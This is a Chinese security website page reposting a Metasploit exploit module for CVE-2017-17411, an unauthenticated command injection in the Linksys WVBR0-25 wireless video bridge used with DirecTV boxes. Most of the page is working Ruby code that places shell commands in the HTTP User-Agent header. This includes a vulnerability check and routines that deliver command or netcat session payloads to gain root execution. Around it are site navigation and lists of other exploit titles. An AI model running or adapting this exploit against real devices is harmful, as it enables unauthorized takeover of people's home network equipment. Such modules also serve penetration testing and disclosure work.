首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linksys WVBR0-25 User-Agent Command Execution
来源:metasploit.com 作者:HeadlessZeke 发布时间:2018-01-04  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linksys WVBR0-25 User-Agent Command Execution',
      'Description' => %q{
        The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie
        cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41
        of the web management portal via the User-Agent header. Authentication is not required to
        exploit this vulnerability.
      },
      'Author'      =>
        [
          'HeadlessZeke' # Vulnerability discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2017-17411'],
          ['ZDI', '17-973'],
          ['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
        ],
      'DisclosureDate' => 'Dec 13 2017',
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat'
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0
      ))
  end

  def check
    check_str = rand_text_alpha(8)
    begin
      res = send_request_raw({
        'method' => 'GET',
        'uri' => '/',
        'agent' => "\"; printf \"#{check_str}"
      })
      if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str))
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Exploiting...")

    if datastore['PAYLOAD'] == 'cmd/unix/generic'
      exploit_cmd
    else
      exploit_session
    end
  end

  def exploit_cmd
    beg_boundary = rand_text_alpha(8)

    begin
      res = send_request_raw({
        'method' => 'GET',
        'uri'    => '/',
        'agent' => "\"; echo #{beg_boundary}; #{payload.encoded} #"
      })

      if res && res.code == 200 && res.body.to_s =~ /#{beg_boundary}/
        print_good("#{peer} - Command sent successfully")
        if res.body.to_s =~ /ret :.+?#{beg_boundary}(.*)/  # all output ends up on one line
          print_status("#{peer} - Command output: #{$1}")
        end
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def exploit_session
    begin
      send_request_raw({
        'method' => 'GET',
        'uri'    => '/',
        'agent' => "\"; #{payload.encoded} #"
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xplico Remote Code Execution
·Kingsoft Antivirus/Internet Se
·Samsung Internet Browser 6.2.0
·Multiple CPUs - 'Spectre' Info
·Linux Kernel < 4.4.0-83 / < 4.
·Iopsys Router - 'dhcp' Remote
·Huawei Router HG532 - Arbitrar
·Western Digital WDMyCloud 'myd
·Cambium ePMP1000 - 'get_chart'
·D-Link DNS-320L 'mydlinkBRiony
·Cambium ePMP1000 - 'ping' Shel
·VMware Workstation ALSA Config
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved